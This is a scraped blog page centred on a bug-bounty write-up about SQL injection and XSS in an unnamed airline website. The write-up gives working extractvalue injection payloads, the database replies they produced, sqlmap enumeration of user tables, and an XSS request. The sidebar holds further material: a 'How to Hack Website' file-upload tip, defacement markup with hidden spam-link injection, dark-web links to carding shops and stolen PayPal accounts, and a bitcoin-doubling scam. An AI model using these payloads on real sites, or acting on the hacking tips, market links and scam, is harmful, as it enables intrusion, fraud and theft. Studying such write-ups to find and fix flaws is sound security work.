Skip to main content

(sqli,xss)Hacker khizer javed sharing knowledge

Homepage

Sign up

Muhammad Khizer Javed

Some of My Friends Think That I’m a geeky hacker, but I don’t know anything about computers. #Penetration_tester on #HackerOne & #Bugcrowd

Aug 29

SQLi & XSS Vulnerabilities in a Popular Airlines Website | BugBounty POC

Hey Guys, Some of my friends was asking for another Writeup. so Here’s One :) Last month I decided to practice a little So I took one of the popular websites… Lets Take That Website as goodwesite.com (As Its Not a public Program) Lets start from a Little basics.

What is SQL Injection Vulnerability?

This vulnerability allows an unauthenticated user to grab data from the victim’s website database, including sensitive user information.

Why This issue existed?

This issue existed because goodwebsite allowed improperly sanitized user input in a login Page; which is basically the same as adding user input inside a raw SQL query. Using this attack vector, an attacker could leak hashed passwords & Some other data.

So! I Was Testing the website and While testing around In Login page i enter username and password randomly and intercept the request with Burp Suite and change the username with Test%27 and Then I forward the Request to Burp Repeater and I got a Reply with an Error That was basically like Request and The Error in Response was like.

Request:POST /register-login/check.php HTTP/1.1
Content-Length: 76
Content-Type: application/x-www-form-urlencoded
Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724
Host: goodwebsite.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
strLogin=Test%27&strPassword=kResponse Error:<pre>PDOException Object ( [message:protected] => SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test’ ‘ and `valid_id` = 1’ at line 1 [string:Exception:private] => [code:protected] => 42000 [file:protected] => /var/www/goodwebsite.server.com/register-login/send.php [line:protected] => 10 [trace:Exception:private] => Array ( [0] => Array ( [file] => /var/www/goodwebsite.server.com/register-login/send.php [line] => 10 [function] => query [class] => PDO [type] => -> [args] => Array ( [0] => SELECT * FROM `wp_ggg_user` WHERE `login` = Test’e ‘ and `valid_id` = 1; ) [previous:Exception:private] => [errorInfo] => Array ( [0] => 42000 [1] => 1064 [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test’ ‘ and `valid_id` = 1’ at line 1 ) </pre>

So! after that error Came Up! I was like WTF :O Lets try Something else so I tried some SQL query And The First Query used was Test%27and extractvalue(1,concat(0x00a,database()))or’ and yes The error That appears this time was similar as above with just a Minor Change that was at the end of the error it was like…

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
goodwebsite’
)

So! it actually gave me the Database Name that was goodwebsite :)

Database Name

I actually got Expert Advice on this From @iamnoooob , (He actually is 1337 calling himself N00B):D Thanks Bro :p

I basically tested some basic query’s like

system_user()
@@version
database()
@@hostname
@@datadir
@@GLOBAL.VERSION
session_user()
schema()
UUID()

So Next The Query was Test%27and extractvalue(1,concat(0x00a,system_user()))or’ and The Error gave me

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
goodwebsite@localhost’
)

System_User

So! At the point The SQL injection was Confirmed But i decided to Dig a little further to get some more information, and the 3rd Query Used was
Test%27and extractvalue(1,concat(0x00a,@@hostname))or’
and This time the error had

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: '
www2.rz.something.com'
)

Hostname

Next i totally forget to check the version so!
Test%27and extravtcalue(1,concat(0x00a,@@version))or’
and The Output was

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
5.1.73–1+deb6u1-log’
)

Database Version

well Then I Tried Test%27and extractvalue(1,concat(0x00a,UUID())or’ and The Error was

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
ab88…..UUDI’
)

UUID

So! Till Now I got Much of the Information That was Enough to Demonstrate the Impact But Sometimes i like to dig More so I Thought to save some time i opened a terminal and Run sqlmap. and Here’s What I got

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
Database: goodwebsite[18 tables]
+ — — — — — — — — — — — — -+
| wp_bms_log |
| wp_bms_quiz_lh_answer |
| wp_bms_quiz_lh_question |
| wp_bms_quiz_lh_quiz |
| wp_bms_statistics |
| wp_bms_user |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+ — — — — — — — — — — — — -+Then:Table: wp_users
[10 columns]
+ — — — — — — — — — — -+ — — — — — — — — — — -+
| Column | Type |
+ — — — — — — — — — — -+ — — — — — — — — — — -+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(255) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(255) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+ — — — — — — — — — — -+ — — — — — — — — — — -+

Exploitation through SQLmap

And Yes! That’s Where I stop Exploitation :P lol

XSS:

Next Thing was to test something else I saw another endpoint their that was like
goodwebsite.com/register-login/send.php it accepts POST request with perimeter
strSendMail=
So I tried the same SQL Test and Got the same Error But I tried XSS payload,
e’%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>
And The Request was like:

POST /register-login/send.php HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Referer: http://goodwebsite.com/
Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724
Host: goodwebsite.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*strSendMail=e’%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>

And BOOM!

XSS

So! I reported Both the Bugs with details and They Actually got patched within an Hour of My report and This is What I got in Reply

Reply

Well I asked if they can invite to Private HackerOneProgram But Yet! They can’t ;’) But it Was good Patrice and Fun :D

That’s All Folks :p Good-bye for now Hop Will Publish Some More POCs Soon ;)and Forget to Send Feedback! 😾

Xss AttackSql InjectionBug Bounty

Show your support

Clapping shows how much you appreciated Muhammad Khizer Javed’s story.

51

Follow

Muhammad Khizer Javed

Some of My Friends Think That I’m a geeky hacker, but I don’t know anything about computers. #Penetration_tester on #HackerOne & #Bugcrowd

Also tagged Xss Attack

Rails Quiz: XSS Edition

Guilherme Simões

21

Also tagged Xss Attack

Xss using dynamically generated js file

Arbaz Hussain

9

Also tagged Xss Attack

Be aware of Cross Site Scripting (XSS) attacks

Uchitha Rajapaksha

10

Comments

Post a Comment

Popular posts from this blog

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
Post a Comment
Read more
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...
Post a Comment
Read more

How to Hack Website

inurl:/editor/editor/filemanager Just open uploadtest.html Or test.html Then select PHP server Upload file Copy uploaded file url Paste it after the link Www.xyz.com //.... Enjoy Regards :- HACKER 22385
Post a Comment
Read more

Abdul hacker deface page

Abdul hacker deface page     <EMBED src=" http://greencall.co.kr/.p/we_will_not_go_down.swf " type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">     <html>         <body onload="scrlsts()"><script type="text/javascript"> document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">'); </script> <a href=" http://cergyd7.dev2.cmantika.com/includes/index.php ">installment loans california bad credit</a> <a href=" http://www.diamondwares.net/logs/index.php ">online cash loan direct lenders</a> <a href=" http://armastroy.com/templates/index.php ">easy loan kota kinabalu</a> <a href=" http://www.magazinecambodia.com/templates/index....
Post a Comment
Read more

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...
1 comment
Read more

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...
Post a Comment
Read more

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...
Post a Comment
Read more

hacking tools and lab

Resources (Free) Virtual Networks (VPNs) • ChaosVPN: http://wiki.hamburg.ccc.de/ChaosVPN • Gh0st Networks: http://www.gh0st.net / • Hacking Lab: https://www.hacking-lab.com / • p0wnlabs: http://p0wnlabs.com / • pwn0: https://pwn0.com / • PentestIT: https://lab.pentestit.ru / Custom Personal Targets • Hack A Server: https://hackaserver.com / • Hack Me: http://hack.me / • Hack This: https://www.hackthis.co.uk / • Smash The Stack: http://smashthestack.org / • Hack The Box: https://www.hackthebox.gr / • SecAdvise: https://labs.secadvise.com / • DarkHive: http://darkhive.net / • Avatao: https://avatao.com / • Root-Me: https://www.root-me.org / Archive/Repository • Security Conference Library: http://archive.liquidmatrix.org / • Shell-Storm.org Repository: http://repo.shell-storm.org/CTF / Misc • Bug crowd: ht...
4 comments
Read more

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...
Post a Comment
Read more

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...
Post a Comment
Read more